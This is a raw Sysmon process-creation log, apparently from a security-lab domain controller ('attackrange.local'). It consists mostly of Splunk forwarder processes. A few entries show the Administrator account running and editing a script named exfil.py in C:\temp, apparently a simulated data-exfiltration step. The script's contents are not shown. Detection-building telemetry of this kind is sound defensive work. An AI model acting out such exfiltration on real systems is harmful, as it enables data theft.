AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038842Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:41:22.973{A8622C2F-5092-6078-4107-00000000AE01}4376C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038825Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:41:21.019{A8622C2F-5091-6078-4007-00000000AE01}4056C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038815Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:41:20.491{A8622C2F-5090-6078-3F07-00000000AE01}5376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038806Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:41:19.825{A8622C2F-508F-6078-3E07-00000000AE01}6380C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038794Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:41:18.065{A8622C2F-508E-6078-3D07-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038784Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:41:17.401{A8622C2F-508D-6078-3C07-00000000AE01}5912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038776Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:41:16.724{A8622C2F-508C-6078-3B07-00000000AE01}6804C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038698Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:40:22.975{A8622C2F-5056-6078-3A07-00000000AE01}4036C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038679Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:40:21.084{A8622C2F-5055-6078-3907-00000000AE01}6964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038669Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:40:20.490{A8622C2F-5054-6078-3807-00000000AE01}5912C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038660Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:40:19.812{A8622C2F-5053-6078-3707-00000000AE01}6656C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038650Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:40:18.086{A8622C2F-5052-6078-3607-00000000AE01}3208C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038640Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:40:17.419{A8622C2F-5051-6078-3507-00000000AE01}3788C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038631Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:40:16.758{A8622C2F-5050-6078-3407-00000000AE01}3820C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038508Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:39:22.980{A8622C2F-501A-6078-3307-00000000AE01}6540C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038492Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:39:21.151{A8622C2F-5019-6078-3207-00000000AE01}3788C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038480Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:39:20.469{A8622C2F-5018-6078-3107-00000000AE01}4788C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038471Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:39:19.805{A8622C2F-5017-6078-3007-00000000AE01}4968C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038461Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:39:18.141{A8622C2F-5016-6078-2F07-00000000AE01}7020C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038451Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:39:17.478{A8622C2F-5015-6078-2E07-00000000AE01}5904C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038442Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:39:16.919{A8622C2F-5014-6078-2D07-00000000AE01}5908C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038420Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:39:12.130{A8622C2F-5010-6078-2C07-00000000AE01}2352C:\Program Files\Notepad++\notepad++.exe7.95Notepad++ : a free (GPL) source code editorNotepad++Don HO don.h@free.frnotepad++.exe"C:\Program Files\Notepad++\notepad++.exe" "C:\temp\exfil.py"C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=45833E3CFFD3716546665DCE0C343F2E,SHA256=5AEC02154C9A23F5D77B11853691449063AA0EF3988C4EB30048DEBBCEC8B947,IMPHASH=DE4B8987D5ADB218127887FA4130E9E8{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000038403Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:39:06.494{A8622C2F-500A-6078-2B07-00000000AE01}5976C:\Program Files\Python38\python.exe3.8.9PythonPythonPython Software Foundationpython.exepython exfil.pyC:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=249A55048751D0C77446657437C342B7,SHA256=5473F5813336283A44FEA373B2C84DCBAF5E7A337EE7A40883DEA3EF4C73A99A,IMPHASH=A1304C4778128720E89539BB55752E4C{A8622C2F-4FF5-6078-2807-00000000AE01}4740C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\temp" 154100x800000000000000038384Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:38:58.012{A8622C2F-5002-6078-2A07-00000000AE01}7120C:\Program Files\Python38\python.exe3.8.9PythonPythonPython Software Foundationpython.exepythonC:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=249A55048751D0C77446657437C342B7,SHA256=5473F5813336283A44FEA373B2C84DCBAF5E7A337EE7A40883DEA3EF4C73A99A,IMPHASH=A1304C4778128720E89539BB55752E4C{A8622C2F-4FF5-6078-2807-00000000AE01}4740C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\temp" 154100x800000000000000038341Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:38:45.584{A8622C2F-4FF5-6078-2807-00000000AE01}4740C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /s /k pushd "C:\temp"C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000038290Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:38:22.957{A8622C2F-4FDE-6078-2707-00000000AE01}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038262Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:38:21.135{A8622C2F-4FDD-6078-2607-00000000AE01}6040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038252Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:38:20.465{A8622C2F-4FDC-6078-2507-00000000AE01}6424C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038243Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:38:19.801{A8622C2F-4FDB-6078-2407-00000000AE01}7136C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038213Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:38:18.541{A8622C2F-4FDA-6078-2107-00000000AE01}5632C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038203Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:38:17.719{A8622C2F-4FD9-6078-2007-00000000AE01}5816C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038192Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:38:16.913{A8622C2F-4FD8-6078-1F07-00000000AE01}5516C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038063Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:37:53.239{A8622C2F-4FC1-6078-1E07-00000000AE01}6808C:\Program Files\Python38\python.exe3.8.9PythonPythonPython Software Foundationpython.exe"C:\Program Files\Python38\python.exe" -OO -E -s -Wi "C:\Program Files\Python38\Lib\compileall.py" -f -x "bad_coding|badsyntax|site-packages|py2_|lib2to3\\tests|venv\\scripts" "C:\Program Files\Python38\Lib"C:\ProgramData\Package Cache\A78D1C6FC532CD468C767506BCBB600C304D4DC0\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=249A55048751D0C77446657437C342B7,SHA256=5473F5813336283A44FEA373B2C84DCBAF5E7A337EE7A40883DEA3EF4C73A99A,IMPHASH=A1304C4778128720E89539BB55752E4C{A8622C2F-4FC1-6078-1C07-00000000AE01}5832C:\ProgramData\Package Cache\A78D1C6FC532CD468C767506BCBB600C304D4DC0\py.exe"C:\ProgramData\Package Cache\A78D1C6FC532CD468C767506BCBB600C304D4DC0\py.exe" -3.8 -OO -E -s -Wi "C:\Program Files\Python38\Lib\compileall.py" -f -x "bad_coding|badsyntax|site-packages|py2_|lib2to3\\tests|venv\\scripts" "C:\Program Files\Python38\Lib" 154100x800000000000000038050Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 